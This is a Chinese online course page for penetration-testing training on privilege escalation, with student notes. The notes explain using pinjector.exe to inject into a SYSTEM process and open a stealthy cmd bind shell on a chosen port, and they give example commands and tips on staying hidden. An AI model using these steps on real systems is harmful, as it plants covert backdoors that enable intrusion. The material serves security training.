默认计划
929人加入学习
(11人评价)
安全测试提权

购买过Kali Linux渗透测试、武官课程包、安全技术会员课程的学员不要再买此课程

价格 ¥ 300.00
该课程属于 高校公益行 | 网络安全实践训练营 请加入后再学习

该方式将我们要执行的服务注入操作系统原本的system启动的服务里,达到更加隐蔽痕迹的目的

该方式需要第三方工具来实现

pinjector.exe

https://www.tarasco.org/security/Process_Injector/

 

-l 枚举出当前可以注入的进程

-p pid 程序 port

 

例:

pinjector.exe -p 832 cmd 555(需要关闭防火墙)

该命令会创建注入PID为832的进程,启动后会给攻击者在端口555提供一个cmd,通过nc类似工具可以连接

 

该方式特点:

    极为隐蔽,只能在端口层面以及进程堆栈层面发现

    但在任务管理器中也会增加新的进程(即上文中的 程序,例中的cmd),且在注入进程的属性中TCP/IP项能查看到侦听了我们让其侦听的端口

[展开全文]

pinjector.exe

极强的隐蔽性

•http://www.tarasco.org/security/Process_Injector/

inject.exe -p <pid> <cmd> <port><Inject into PID>

netstat -nao | find "555"               //查端口

 

[展开全文]

下载好注入程序,然后将压缩包中的(1)pinjector.exe提取出放在c盘根目录

(2)    执行pinjector.exe -l 查看可以注入的进程

(3)执行pinjector.exe -p 600 cmd 2345   注入进程pid为600的进程,使用端口2345返回cmd,执行成功后在任务管理器里并没有多出进程

[展开全文]

注入进程提权

工具  - pinjector.exe

(相当于开了一个后门,隐蔽性极高,不会创建新的进程,很难发现)

pinjector.exe -p 656(pid) cmd 5555(端口)

#将pinjector.exe注入到656这个进程下,当外部连接5555端口时,系统会将cmd提交出去

[展开全文]

授课教师

安全经理

课程特色

视频(16)
下载资料(1)